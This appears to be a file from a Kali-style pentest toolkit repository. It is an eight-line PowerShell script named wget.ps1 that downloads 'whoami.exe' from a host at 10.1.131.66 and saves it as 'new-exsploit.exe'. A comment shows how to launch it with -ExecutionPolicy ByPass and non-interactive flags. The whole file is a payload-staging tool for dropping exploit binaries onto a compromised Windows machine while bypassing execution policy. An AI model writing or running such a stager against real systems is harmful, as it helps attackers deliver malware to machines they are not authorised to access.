Files
kali_inux/upload_tools/wget.ps1
2017-08-04 20:49:02 +08:00

8 lines
259 B
PowerShell

$strongeDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = "http://10.1.131.66/whoami.exe"
$file = "new-exsploit.exe"
$webclient.DownloadFile($url, $file)
# powershell.exe -ExecutionPolicy ByPass -NoLogo -NonInteractive -NoProfile -File wget.ps1